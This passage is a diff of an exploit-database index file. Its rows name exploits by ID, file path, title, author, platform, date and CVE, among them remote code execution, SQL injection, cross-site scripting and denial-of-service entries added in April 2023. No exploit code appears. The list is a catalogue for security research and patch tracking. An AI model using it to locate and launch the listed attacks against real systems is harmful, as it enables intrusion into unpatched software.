Injections",2006-05-28,nukedx,webapps,asp,,2006-05-27,,1,OSVDB-26119;CVE-2006-2731;OSVDB-26118;OSVDB-26117;OSVDB-26116;OSVDB-26115;OSVDB-26114;OSVDB-26113;OSVDB-26112;OSVDB-26111;OSVDB-26110;OSVDB-26109;OSVDB-26108;OSVDB-26107;OSVDB-26106,,,,,http://www.nukedx.com/?viewdoc=34 +51335,exploits/asp/webapps/51335.txt,"ENTAB ERP 1.0 - Username PII leak",2023-04-08,"Deb Prasad Banerjee",webapps,asp,,2023-04-08,2023-04-08,0,CVE-2022-30076,,,,, 2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,webapps,asp,,2006-12-22,,1,OSVDB-31681;CVE-2006-6803,,,,, 29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30571,,,,,https://www.securityfocus.com/bid/21192/info 29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30572,,,,,https://www.securityfocus.com/bid/21192/info @@ -1834,7 +1835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,, 41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,, -51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,, +51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-04-08,0,CVE-2022-41441,,,,, 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,, 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,, @@ -2795,6 +2796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,webapps,cgi,,2007-08-05,,1,OSVDB-39198;CVE-2007-4256,,,,, 30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",webapps,cgi,,2007-07-02,2013-12-13,1,CVE-2007-3572;OSVDB-37808,,,,,https://www.securityfocus.com/bid/24743/info 39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,webapps,cgi,,2014-04-02,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67215/info +51347,exploits/cgi/webapps/51347.txt,"ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)",2023-04-08,"Abdulaziz Saad",webapps,cgi,,2023-04-08,2023-04-08,0,CVE-2023-26692,,,,, 37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",webapps,cgi,,2012-09-24,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/55638/info 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,,2020-04-10,2020-04-10,0,,,,,, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,,2020-04-23,2020-04-23,0,,,,,, @@ -3032,6 +3034,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,,2020-05-08,2020-05-08,0,,,,,, 19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",dos,hardware,,2012-06-11,2016-12-09,1,OSVDB-82780;CVE-2012-1493,,,,,https://www.trustmatta.com/advisories/MATTA-2012-002.txt 10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,dos,hardware,,2010-01-02,,1,,,,,, +51326,exploits/hardware/dos/51326.py,"FortiRecorder 6.4.3 - Denial of Service",2023-04-08,"Mohammed Adel",dos,hardware,,2023-04-08,2023-04-08,0,CVE-2022-41333,,,,, 27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,dos,hardware,,2013-07-27,2013-07-27,0,CVE-2013-0699;OSVDB-92804,,,,, 8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,dos,hardware,,2009-03-22,,1,OSVDB-53518;CVE-2009-1152,,,,, 13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware,,2010-06-10,2016-10-27,1,,,goodreader_poc.xls,,, @@ -3847,6 +3850,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",2022-06-03,LiquidWorm,remote,hardware,,2022-06-03,2022-06-03,0,,,,,, 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,, +51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,, 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,, 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,, 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548 @@ -3989,6 +3993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,,2020-08-07,2020-08-07,0,,,,,, 32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80,2014-03-26,2014-03-26,0,CVE-2014-1982;OSVDB-105060,,,,, 20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",webapps,hardware,,2012-08-20,2012-08-20,0,OSVDB-85508,,,,, +51325,exploits/hardware/webapps/51325.py,"Altenergy Power Control Software C1.2.5 - OS command injection",2023-04-08,"Ahmed Alroky",webapps,hardware,,2023-04-08,2023-04-08,0,CVE-2023-28343,,,,, 9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80,2009-11-15,,1,OSVDB-60315;OSVDB-60314,,,,, 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,,2019-07-30,2019-07-30,1,CVE-2019-3948,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://www.tenable.com/security/research/tra-2019-36 37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80,2015-06-16,2016-10-10,1,OSVDB-123251,,,,, @@ -5400,6 +5405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,,2020-04-24,2020-04-24,0,,,,,, 44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,,2018-05-21,2018-05-21,0,,,,,http://www.exploit-db.comgitbucket.war, 39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848,2016-01-27,2016-01-27,1,,,,http://www.exploit-db.com/screenshots/idlt39500/screen-shot-2016-01-26-at-194716.png,, +51339,exploits/java/webapps/51339.java,"Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)",2023-04-08,"Youssef Muhammad",webapps,java,,2023-04-08,2023-04-08,0,CVE-2023-0669,,,,, 41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,,2017-02-27,2017-02-27,0,,,,,http://www.exploit-db.comgrails-pdf-0.6.zip, 28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,webapps,java,,2006-06-27,2013-09-06,1,,,,,,https://www.securityfocus.com/bid/18677/info 22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",webapps,java,,2003-06-09,2012-11-16,1,OSVDB-4329,,,,,https://www.securityfocus.com/bid/7855/info @@ -5821,6 +5827,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",webapps,jsp,,2010-10-20,2010-10-20,0,CVE-2010-3514,,,,, 25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,webapps,jsp,,2005-03-08,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12752/info 9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,webapps,jsp,,2009-10-14,,1,CVE-2006-5675;OSVDB-33926,,,,,http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/ +51350,exploits/jsp/webapps/51350.txt,"Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)",2023-04-08,dwbzn,webapps,jsp,,2023-04-08,2023-04-08,0,CVE-2022-43939;CVE-2022-43769,,,,, 38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",webapps,jsp,,2013-01-22,2015-09-18,1,CVE-2013-1410;OSVDB-89567,,,,,https://www.securityfocus.com/bid/57514/info 25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,webapps,jsp,,2005-05-09,2013-05-22,1,CVE-2005-1193;OSVDB-16439,,,,,https://www.securityfocus.com/bid/13545/info 32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",webapps,jsp,,2009-01-07,2014-04-07,1,CVE-2009-0699;OSVDB-52965,,,,,https://www.securityfocus.com/bid/33153/info @@ -7004,6 +7011,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20 3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar, 27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,local,linux,,2006-02-15,2013-07-31,1,CVE-2006-0455;OSVDB-23221,,,,,https://www.securityfocus.com/bid/16663/info +51331,exploits/linux/local/51331.txt,"Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)",2023-04-08,"Rafay Baloch and Muhammad Samak",local,linux,,2023-04-08,2023-04-08,0,,,,,, 40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,,2016-12-19,2018-11-17,1,,,,,,https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",2021-10-07,"Kiran Ghimire",local,linux,,2021-10-07,2021-10-07,1,CVE-2021-22557,,,,http://www.exploit-db.comslo-generator-2.0.0.tar.gz, 1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux,,2005-08-29,2016-12-19,1,OSVDB-19082;CVE-2005-2772,,,,, @@ -10293,6 +10301,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple,,2015-10-13,2015-10-13,0,CVE-2015-7805;OSVDB-128868,,,,, 1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",local,multiple,,2006-03-04,2016-06-29,1,OSVDB-23782;CVE-2005-1544;OSVDB-16350,,,,http://www.exploit-db.comtiff-3.7.1.tar.gz, 12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,local,multiple,,2010-04-06,2017-11-15,1,,,,,, +51333,exploits/multiple/local/51333.rb,"Lucee Scheduled Job v1.0 - Command Execution",2023-04-08,"Alexander Philiotis",local,multiple,,2023-04-08,2023-04-08,0,,,,,, 44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,,2018-02-20,2018-02-20,1,CVE-2017-6516,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/74c6e21f49bc15ebef253886c3f37ace419c6f32/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info @@ -10960,6 +10969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,, 40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,, +51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,, 19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info 19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950 19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",remote,multiple,,1998-01-01,2012-06-13,1,OSVDB-276;CVE-1999-0278,,,,,https://www.securityfocus.com/bid/149/info @@ -11475,6 +11485,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,, 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,, +51327,exploits/multiple/webapps/51327.txt,"Adobe Connect 11.4.5 - Local File Disclosure",2023-04-08,h4shur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-22232,,,,, 33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info 41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Request Forgery (CSRF)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt 41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Scripting (XSS)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt @@ -11971,6 +11982,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/ 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 +51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,, 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,, 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,, @@ -12086,11 +12098,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,, 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,, +51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,, 50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,, 37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,, 35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",webapps,multiple,,2015-01-26,2015-01-26,0,CVE-2014-9226;OSVDB-117515;CVE-2014-9225;CVE-2014-9224;CVE-2014-7289;OSVDB-117359;OSVDB-117357;OSVDB-117356;OSVDB-117355,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00 47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443,2019-07-03,2019-07-03,0,CVE-2019-9701,"Cross-Site Scripting (XSS)",,,, +51342,exploits/multiple/webapps/51342.txt,"Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-25630,,,,, 23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple,,2012-12-03,2012-12-03,0,CVE-2012-0308;OSVDB-84897,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00 42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",webapps,multiple,,2017-09-04,2017-09-04,1,CVE-2017-6328,,,,, 41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2015-2994,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -16965,6 +16979,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,webapps,php,,2006-06-02,,1,OSVDB-25977;CVE-2006-2866,,,,, 29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34814,,,,,https://www.securityfocus.com/bid/23411/info 29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34815,,,,,https://www.securityfocus.com/bid/23411/info +51353,exploits/php/webapps/51353.txt,"dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,, 36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79697,,,,,https://www.securityfocus.com/bid/52221/info 36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79699,,,,,https://www.securityfocus.com/bid/52221/info 36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79698,,,,,https://www.securityfocus.com/bid/52221/info @@ -18998,7 +19013,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,, 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,, 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,, -51231,exploits/php/webapps/51231.txt,"GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31068,,,,, 51233,exploits/php/webapps/51233.txt,"GLPI 